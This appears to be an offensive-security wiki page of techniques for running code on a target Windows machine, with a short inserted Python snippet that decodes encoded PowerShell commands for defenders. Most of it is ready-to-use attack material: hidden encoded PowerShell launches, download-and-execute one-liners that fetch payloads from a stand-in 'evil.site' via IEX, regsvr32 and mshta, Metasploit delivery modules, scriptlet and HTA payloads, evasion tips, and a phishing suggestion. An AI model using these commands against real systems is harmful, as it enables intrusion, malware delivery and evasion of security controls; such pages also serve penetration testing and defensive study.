Execution
Tips and tricks to execute your code on the target Windows system.
Simple Execution
Different ways to perform simple command execution on the target system when CMD is not directly available.
WMIC
```
wmic process call create <CMD>
wmic process call create "cmd.exe /c <CMD>"
```
FTP
The `ftp` utility allows you to execute commands by preceding them with the `!` sign.
```
ftp.exe
ftp> !<CMD>
```
You can also be dropped into a CMD prompt by typing `!` without specifying any command.
```
ftp.exe
ftp> !
Microsoft Windows [Version 10.0.16299.547]
(c) 2017 Microsoft Corporation. All right reserved.
C:\Users\betelsam>
```
PowerShell
Description of the options to pass to `powershell.exe` to execute a custom PSH-CMD payload.
```
powershell.exe -nop -w hidden -e <base64-unicode payload>
powershell.exe -nop -w hidden -command "<raw powershell command>"
```
| Option | Description |
|---|---|
| `-NoP` | Short for `-NoProfile`, prevents PowerShell from loading a profile of custom settings. |
| `-NonI` | Prevents PowerShell from displaying an interactive prompt to the user on the screen. |
| `-W Hidden` | Sets the window style for PowerShell to Hidden. |
| `-Exec Bypass` | Sets the execution policy for PowerShell to Bypass (code needs to run with admin privileges). |
| `-e <BASE64>` | Short for `-EncodedCommand`, accepts a base64-encoded unicode-string version of a command. |
| `-Command "<COMMANDS>"` | Executes the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. |
Info
The `-EncodedCommand` option expects a unicode string (UTF-16LE) encoded in base64. The unicode part is very important: most of our string representations use UTF-8 instead, which will not work in this case.
To encode a string in unicode, use the following CyberChef recipe: [https://gchq.github.io/CyberChef](https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF16LE%20(1200)')To_Base64(‘A-Za-z0-9%2B/%3D’))
Alternatively, see the base64 (unicode) section of the PowerShell page to encode a script file in unicode.
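The same encoding rule is what a defender applies in reverse when an `-EncodedCommand` argument shows up in process-creation telemetry. The following is an added example, not code from the original page: a small Python helper that builds the UTF-16LE/base64 form and decodes it back out of a command line, flagging the UTF-8 mistake described above. The command lines it runs over are constructed samples, not real telemetry.

```python
import base64
import binascii


def encode_command(command: str) -> str:
    """Build the argument powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Locate an -EncodedCommand argument in a process command line and decode it.

    Returns None when no such argument is present, otherwise a dict with the flag
    as written, whether the bytes look like UTF-16LE, and the recovered script.
    """
    tokens = cmdline.split()
    for flag, arg in zip(tokens, tokens[1:]):
        # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
        if len(flag) < 2 or not "-encodedcommand".startswith(flag.lower()):
            continue
        try:
            raw = base64.b64decode(arg.strip("\"'"), validate=True)
        except (binascii.Error, ValueError):
            return {"flag": flag, "utf16le": False, "script": None}
        # UTF-16LE text that is mostly ASCII carries a NUL in (nearly) every odd byte;
        # a UTF-8 string base64'd by mistake does not, and is often odd-length.
        utf16le = len(raw) % 2 == 0 and raw[1::2].count(0) >= len(raw) // 4
        script = raw.decode("utf-16-le", errors="replace") if utf16le else None
        return {"flag": flag, "utf16le": utf16le, "script": script}
    return None


# Constructed process-creation command lines (not real telemetry), shaped like
# the CommandLine field of a Sysmon Event ID 1 or Security 4688 record.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -e " + encode_command("Get-Process"),
    "powershell.exe -NoP -NonI -W Hidden -EncodedCommand "
    + base64.b64encode("Get-Process".encode("utf-8")).decode("ascii"),  # wrong encoding
    "cmd.exe /c whoami",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(line[:60], "->", decode_encoded_command(line))
```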
Tip
Alternative way to launch PowerShell: `forfiles /p %COMSPEC:~0,19% /s /c "@file -noe" /m po*l.*e` (`%COMSPEC:~0,19%` expands to `C:\Windows\System32` when `COMSPEC` has its default value).
External Resources
Web Delivery
Deliver your payload hosted on a web server.
PowerShell
```powershell
IEX (New-Object System.Net.WebClient).DownloadString('http://evil.site/powershell-payload.txt')
```
Tip
Deliver a base64-encoded payload to obfuscate its purpose and try to evade security solutions. See the base64 section of the PowerShell page for the decoding procedure.
Proxy Configuration:
By default, this command will use the proxy configured for the system in Internet Options. Configure the `Net.WebClient` object to bypass the proxy for a specific request:
```powershell
$wc = New-Object Net.WebClient
$wc.proxy = $null
```
In the case of a proxy requiring authentication, configure the `Net.WebClient` object to use the Windows session credentials:
```powershell
$wc = New-Object Net.WebClient
$wc.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
```
Ignore Certificate Issues:
```powershell
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}
```
RegSvr32
Delivers a JScript payload that uses ActiveX to execute a command (see Windows Script Host).
```
regsvr32 /s /n /u /i:http://evil.site/payload scrobj.dll
```
Metasploit: `auxiliary/server/regsvr32_command_delivery_server`:
```
use auxiliary/server/regsvr32_command_delivery_server
set cmd [COMMAND]
```
Metasploit: `exploit/multi/script/web_delivery`:
```
use exploit/multi/script/web_delivery
set target Regsvr32
```
Warning
This one chains a secondary PowerShell web delivery to execute the payload set using `set payload`. Since this might not be what you want, prefer the other module, which gives more granular control over what is being executed.
Custom Payload:
```xml
<?XML version="1.0"?>
<scriptlet>
<registration progid="[RANDOM ALPHANUM ID]" classid="{c0cc880f-3456-9812-15ba-cfee08744d70}">
<script>
<![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe",0);]]>
</script>
</registration>
</scriptlet>
```
Note that `classid` could be any random GUID.
MSHTA
Delivers an HTML Application (HTA) capable of running VBS or JS (see Windows Script Host), either as a full-fledged website or via the command line. See the Microsoft documentation for more details.
```
mshta http://evil.site/payload.hta
```
This could also be used in a phishing attack by simply tricking the user into visiting the webpage using Internet Explorer or Edge.
Metasploit: `exploit/windows/misc/hta_server`:
```
use exploit/windows/misc/hta_server
set target Powershell [x86/x64]
set payload [PAYLOAD]
```
This will use VBA to execute any PSH-CMD payload.
Custom Payload: As an HTA application is a full-fledged website that can embed VBS or JS, you can use either to execute any command via ActiveX.
Example using VBScript:
```html
<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe",0
window.close()
</script>
```
Example using JScript:
```html
<script language="JScript">
var objShell = new ActiveXObject("WScript.shell");
objShell.run('"calc.exe"');
window.close();
</script>
```
MSBuild
TO TEST AND DOCUMENT